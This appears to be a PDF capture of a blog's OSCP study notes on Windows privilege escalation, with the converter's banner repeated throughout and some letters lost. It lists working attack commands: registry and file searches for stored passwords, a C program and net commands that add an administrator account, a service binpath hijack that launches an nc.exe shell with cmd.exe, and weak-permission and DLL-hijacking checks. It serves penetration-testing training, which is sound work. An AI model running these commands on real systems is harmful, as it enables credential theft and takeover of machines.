MENU

SECURISM
All about Information Security

OSCP NOTES – PRIVILEGE ESCALATION (WINDOWS)

USEFUL RESOURCES

http://it-ovid.blogspot.in/2012/02/windows-privilege-escalation.html
http://toshellandback.com/2015/11/24/ms-priv-esc/

WATCH YOU TUBE VIDEOS

http://www.youtube.com/watch?v=kMG8IsCohHA
http://www.youtube.com/watch?v=_8xJaaQlpBo

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 http://www.greyhathacker.net/?p=738

WINDOWS EXPLOIT SUGGESTER

https://github.com/GDSSecurity/Windows-Exploit-Suggester

python /home/nikhil/scripts/windows-exploit-suggester.py -d 2016-07-02-mssb.xls -i systeminfo -l

systeminfo le contains: ASCII output of ‘systeminfo’ command run in windows
-l : show only local exploits
https://www.exploit-db.com/docs/26000.pdf

WINDOWS ADMINISTRATOR TO SYSTEM

PSEXEC.exe -i -s -d CMD

https://blogs.technet.microso t.com/askds/2008/10/22/getting-a-cmd-prompt-as-system-in-windows-vista-and-windows-
server-2008/
http://carnal0wnage.attackresearch.com/2013/07/admin-to-system-win7-with-remoteexe.html

ADD ADMIN USER ACCOUNT

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 net user /add [username] [password]
net localgroup administrators [username] /add

Compile follow C code into exe to add admin user account

#include
int main()
{ int i;

i = system(“net user /add ashoka qwerty”);

i = system(“net localgroup administrators ashoka /add”);

return 0;
}

WINDOWS PRIV ESCALATION INFO GATHER

windows-privesc-check2.exe

windows-privesc-check2.exe –audit -a -o wpc-report

wmic_info.bat

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 BASIC COMMANDS

systeminfo | ndstr /B /C:”OS Name” /C:”OS Version”

hostname
echo %username%
net users
net user user1

If user is in power user group, refer https://blogs.technet.microso t.com/markrussinovich/2006/05/01/the-power-in-power-

users/

net view
net user /domain
echo %logonserver%
ipcon g /all
route print
arp -A
netstat -ano
netsh rewall show state
netsh rewall show con g
schtasks /query /fo LIST /v
tasklist /SVC

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 net start Running windows services
DRIVERQUERY

Search for le names

dir /s *pass* == *cred* == *vnc* == *.con g*

Search within les

ndstr /si pass *.xml *.ini *.txt *.con g *.cfg *.bat

ndstr /si pwd *.xml *.ini *.txt *.con g *.cfg *.bat
Search registry

reg query HKLM /f password /t REG_SZ /s

reg query HKLM /f pass /t REG_SZ /s
reg query HKLM /f pwd /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

SEARCH FOR SENSITIVE FILES

dir sysprep.inf /s
dir sysprep.xml /s
dir Unattended.xml /s

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 WHEN MACHINE ON DOMAIN (GROUP POLICY PREFERENCE GPP)

Search groups.xml in SYSVOL

Metasploit module for extracting it : post/windows/gather/credentials/gpp

C:\Windows\SYSVOL\sysvol
C:\ProgramData\Microso t\Group Policy\History
Extracted these two paths from above exploit module

Encryption key: https://msdn.microso t.com/en-us/library/Cc422924.aspx

Good resource on this topic : http://www.toshellandback.com/2015/08/30/gpp/

INSTALL *.MSI AS SYSTEM IF

reg query HKLM\SOFTWARE\Policies\Microso t\Windows\Installer\AlwaysInstallElevated

reg query HKCU\SOFTWARE\Policies\Microso t\Windows\Installer\AlwaysInstallElevated

WINDOWS SERVICES

Info on service

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 sc qc
Prevents pop ups to user :

accesschk.exe /accepteula

Use accesschk 5.2 if 6.0 doesn’t work

Access permissions on speci c service

accesschk.exe -ucqv
Access permissions on speci c Group

accesschk.exe -uwcqv “Authenticated Users” *

Look for following permissions

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 MODIFYING VULNERABLE SERVICES

sc qc upnphost
sc con g upnphost binpath= “C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe”
sc con g upnphost obj= “.\LocalSystem” password= “”
sc qc upnphost
net start upnphost

FILES/FOLDER PERMISSIONS

http://www.greyhathacker.net/?p=738
1. Examine ALL the binpaths for the windows services, scheduled tasks and startup tasks.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 2. Look for permissions on les/folders if can be changed.
3. Replace the binaries/DLLs if possible

Find all weak folder permissions per drive.

accesschk.exe -uwdqs Users c:\

accesschk.exe -uwdqs “Authenticated Users” c:\
Find all weak le permissions per drive.

accesschk.exe -uwqs Users c:\*.*

accesschk.exe -uwqs “Authenticated Users” c:\*.*
Find weak permissions via Cacls or ICacls

cacls “C:\Program Files” /T | ndstr Users

or
icacls “C:\Program Files” /T | ndstr Users

DLL HIJACKING

If any service tries to access non-exiting DLLs. But how to identify which services will do that? This might be done, by
running the same service in a test environment and using sysinternal’s procmon to see what DLLs are requested by the

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 service. DLL Redirection could also be used. https://msdn.microso t.com/en-
us/library/windows/desktop/ms682600(v=vs.85).aspx

You can see the DLL search order on 32-bit systems below:
1 – The directory from which the application loaded No access as limited user
2 – 32-bit System directory (C:\Windows\System32) No access as limited user
3 – 16-bit System directory (C:\Windows\System) No access as limited user
4 – Windows directory (C:\Windows) No access as limited user
5 – The current working directory (CWD) NA
6 – Directories in the PATH environment variable (system then user)

Check for permissions on directories in PATH environment variable

echo %PATH%
accesschk.exe -dqv “C:\Python27”
sc qc

Generate msfvenom DLL payload

VNC STORED

reg query “HKCU\So tware\ORL\WinVNC3\Password”

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 WINDOWS AUTOLOGIN:

reg query “HKLM\SOFTWARE\Microso t\Windows NT\Currentversion\Winlogon”

SNMP PARAMETERS:

reg query “HKLM\SYSTEM\Current\ControlSet\Services\SNMP”

PUTTY CLEAR TEXT PROXY CREDENTIALS:

reg query “HKCU\So tware\SimonTatham\PuTTY\Sessions”

PASSWORD RECOVERY TOOLS

http://www.nirso t.net/

SHATTER ATTACK

For windows NT4.0, Win2000, WinXP

https://en.wikipedia.org/wiki/Shatter_attack
http://www.hpl.hp.com/techreports/2005/HPL-2005-87.pdf

SCHEDULED TASKS
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 schtasks /query /fo LIST /v

Find a task pointing to an insecure location

ORPHANED INSTALLS

Missing les in writable locations. But how to identify orphaned installs?

Advertisements

REPORT THIS AD

SHARE THIS:

 Twitter  Facebook

Like

Be the first to like this

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Be the first to like this.

LEAVE A REPLY
Enter your comment here...

Search …

PAGES
Contact
OSCP Notes – Bu fer Over low
OSCP Notes – Exploitation
OSCP Notes – File Transfers
OSCP Notes – Information Gathering
OSCP Notes – Meterpreter
OSCP Notes – Password Attacks
OSCP Notes – Port Forwarding

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 OSCP Notes – Port Scanning
OSCP Notes – Privilege Escalation (Linux)
OSCP Notes – Privilege Escalation (Windows)
OSCP Notes – Shells

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD